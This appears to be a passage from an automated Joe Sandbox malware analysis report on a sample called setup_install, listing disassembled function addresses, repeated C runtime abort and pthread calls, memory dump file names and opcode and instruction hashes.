                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 75f57e80dd8fc20f72dd27c55d95575a4ca4b551e5d35625fe1a31674b764102
                                                                                                                            • Instruction ID: f15d3323de5e8bd45f7b01de121494404ca74128cfc8c63f2f0739f4adfef075
                                                                                                                            • Opcode Fuzzy Hash: 75f57e80dd8fc20f72dd27c55d95575a4ca4b551e5d35625fe1a31674b764102
                                                                                                                            • Instruction Fuzzy Hash: 1CF0E9B14182154ADA215E154144235FAD09B42314F591C6FDE8137383823CDC66CA6F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E9E0 Relevance: 19.5, APIs: 13, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: d2dc2d097c1a4efbf659a81418529a0b1dc6761b0b23577fb6affd4cbfcc4834
                                                                                                                            • Instruction ID: 34fadc63bfc7f9619f5f44255f7bcf70bee67eceb74d59cdc5026385d1e51d12
                                                                                                                            • Opcode Fuzzy Hash: d2dc2d097c1a4efbf659a81418529a0b1dc6761b0b23577fb6affd4cbfcc4834
                                                                                                                            • Instruction Fuzzy Hash: EFE0D832A0810786C730EE26A08017BE2F1DA91744F155C3FE456B7101DB35EC1689AF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EA30 Relevance: 19.5, APIs: 13, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: e27b64d46ed8907ed3065c91cc50c382aaca52215ad7dc8243f5202a1ae04a2a
                                                                                                                            • Instruction ID: b05e13697252f09963dab9e88dd09c2db2dbb0d411ec1c10e01e1223b8b4d21a
                                                                                                                            • Opcode Fuzzy Hash: e27b64d46ed8907ed3065c91cc50c382aaca52215ad7dc8243f5202a1ae04a2a
                                                                                                                            • Instruction Fuzzy Hash: 74E030708A930A8BC641FF09B08806EF7E5FAD5304F6529AED68077205C734E8228E5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E869 Relevance: 19.5, APIs: 13, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: a8dd994f2b76aef36adde45b7ee9eddc7fb9249020bfd4c6af360795d6f37b6e
                                                                                                                            • Instruction ID: 69a77604abe2a52a52af9bdef902363ccd6705cf5768864dce781b5292acea57
                                                                                                                            • Opcode Fuzzy Hash: a8dd994f2b76aef36adde45b7ee9eddc7fb9249020bfd4c6af360795d6f37b6e
                                                                                                                            • Instruction Fuzzy Hash: EBE0867085861A86CB14AE66A0851BDF7F1DF4630CF102C2EE59577401D324ED138A6E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EA65 Relevance: 19.5, APIs: 13, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 01c95e0ee1fd3a866f90ace4f1c332c8fa7fef583250e6db998a4a08324c142d
                                                                                                                            • Instruction ID: a1c998bb1c5193c39398dac140d1d48728715319505b3db2bbf49d7bf0bba9d1
                                                                                                                            • Opcode Fuzzy Hash: 01c95e0ee1fd3a866f90ace4f1c332c8fa7fef583250e6db998a4a08324c142d
                                                                                                                            • Instruction Fuzzy Hash: 85E04F709A92068BC650BE59B1C806EF7E5FAC6300F5429AED580B7205CB35E8618A5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E8AC Relevance: 19.5, APIs: 13, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: d3249a1cee8e32c04cee607966d58a0de7aaec68a083955db01a2ca434c0468b
                                                                                                                            • Instruction ID: 74ff46cebe325fb8defa02672df17bbe080344957ed930819fc88c2927789997
                                                                                                                            • Opcode Fuzzy Hash: d3249a1cee8e32c04cee607966d58a0de7aaec68a083955db01a2ca434c0468b
                                                                                                                            • Instruction Fuzzy Hash: A4D0A771E58207868A20AE76618407AE5F4EA07348F402C2EF585B7101CA28DC5399BF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E8D0 Relevance: 19.5, APIs: 13, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 795d2377740f33557735e6c7a91d9e75bd7a952b1167a6523ab22306a0ede11d
                                                                                                                            • Instruction ID: 57801eb6f9b9f743242d5409ff345386b46cc1744f24a465dd5309c7c2ee4f7e
                                                                                                                            • Opcode Fuzzy Hash: 795d2377740f33557735e6c7a91d9e75bd7a952b1167a6523ab22306a0ede11d
                                                                                                                            • Instruction Fuzzy Hash: 8DD0127199C30D4685207EE5318117EF1F4CA47308F553C2FAA843B1125A6DDC638DAF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E893 Relevance: 19.5, APIs: 13, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 2102d3f1a04693160f552ce0545a29ddb16438f83aabdc9a7c07dbf7d92e6d9e
                                                                                                                            • Instruction ID: 85ab6065bc057f408dc54565e65843a9afe88c01f5db71fe02b47302152f9c47
                                                                                                                            • Opcode Fuzzy Hash: 2102d3f1a04693160f552ce0545a29ddb16438f83aabdc9a7c07dbf7d92e6d9e
                                                                                                                            • Instruction Fuzzy Hash: 94D012708D830D4685507E5531C507DE2F5D947329F553D2EE6803B1525A2EDCA38DAF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040ED09 Relevance: 18.1, APIs: 12, Instructions: 143COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 0040EF30
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 0040EF8E
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort$pthread_once
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3910317518-0
                                                                                                                            • Opcode ID: c91292405e3e4246e9c31f48b0bede175f273c18b93d75cac3bb4687fdc92e99
                                                                                                                            • Instruction ID: 429c7ffdfe506c9d21154ec7a219fa080f304a554b77d04ae86f5481e40d316e
                                                                                                                            • Opcode Fuzzy Hash: c91292405e3e4246e9c31f48b0bede175f273c18b93d75cac3bb4687fdc92e99
                                                                                                                            • Instruction Fuzzy Hash: 2051F3719087468BD710CF29C48439ABBE1EF81368F194C7EE8D56B392C379E859CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EF40 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040DFC0: strlen.MSVCRT ref: 0040E043
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 0040EF8E
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort$pthread_oncestrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2914753974-0
                                                                                                                            • Opcode ID: e0deacbbd513ace63fb05fcb242d450de14c1e359456db30e9318ccbc360304b
                                                                                                                            • Instruction ID: 60b60e8810651f0b4870fec695e67d69ca5153d2e9394f53d6ba73e71a88811b
                                                                                                                            • Opcode Fuzzy Hash: e0deacbbd513ace63fb05fcb242d450de14c1e359456db30e9318ccbc360304b
                                                                                                                            • Instruction Fuzzy Hash: D5313AA04087C5CAE711DF29A888B967FD4A79230CF0485BEDA945F293D3BA4449C76F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F2F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 133COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 0-2766056989
                                                                                                                            • Opcode ID: 14d1215be2dfdd1e85bd1e6674e392abdf90a82e86d131c8c12062665c1b0902
                                                                                                                            • Instruction ID: dba152e479980a6adafb35bbd803662c28f3cebead66a5c896154641e28360be
                                                                                                                            • Opcode Fuzzy Hash: 14d1215be2dfdd1e85bd1e6674e392abdf90a82e86d131c8c12062665c1b0902
                                                                                                                            • Instruction Fuzzy Hash: C041C8719042854FDB35CE28908476BBBE1BF81328F18847EDD815BB92C779DC4AC789
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040F080 Relevance: 15.0, APIs: 10, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
